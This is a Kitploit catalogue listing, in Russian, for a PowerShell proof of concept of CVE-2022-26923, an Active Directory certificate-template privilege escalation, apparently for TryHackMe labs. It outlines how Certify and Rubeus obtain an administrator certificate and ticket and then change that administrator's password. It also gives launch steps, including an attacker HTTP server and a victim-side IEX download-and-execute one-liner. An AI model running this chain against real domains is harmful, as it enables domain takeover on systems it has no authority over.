Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-26923-Powershell-POC — PowerShell PoC для загрузки и автоматического запуска Certify и Rubeus из памяти. | Kitploit
Инструменты/GitHubGitHub/lsecqt/cve-2022-26923-powershell-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHublsecqt/cve-2022-26923-powershell-poc

CVE-2022-26923-Powershell-POC

PowerShell PoC для загрузки и автоматического запуска Certify и Rubeus из памяти.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
17814 лет назадЕщё не проверено

CVE-2022-26923-Powershell-POC

Powershell POC для загрузки и автоматического запуска Certify и Rubeus из памяти.

Как это работает?

  1. Загружает Certify.exe и Rubeus.exe в память.
  2. Сканирует целевую машину на наличие неправильно настроенных шаблонов сертификатов. (подробнее на https://www.youtube.com/watch?v=HBRCI5O35R8)
  3. Запрашивает сертификат для административного пользователя на основе уязвимого шаблона.
  4. Отправляет сертификат обработчику сертификатов, который преобразует его в формат .pfx и отправляет обратно клиенту.
  5. Использует Rubeus для загрузки сертификата и создания билета для административного пользователя.
  6. Меняет пароль административного пользователя. (Только для демонстрации)

POC протестирован в следующих лабораториях TryHackMe: https://tryhackme.com/room/adcertificatetemplates

Эта CVE используется для повышения привилегий, поэтому в данной демонстрации, а также в лаборатории THM, не рассматривается начальная эксплуатация.

Шаги:

  1. python3 -m http.server 80 [Машина атакующего]
  2. python3 uploader.py 8000 [Машина атакующего]
  3. IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [Машина жертвы]

Примечание: Данный POC предназначен для образовательных целей, вы несете ответственность за свои действия.

Скачать инструмент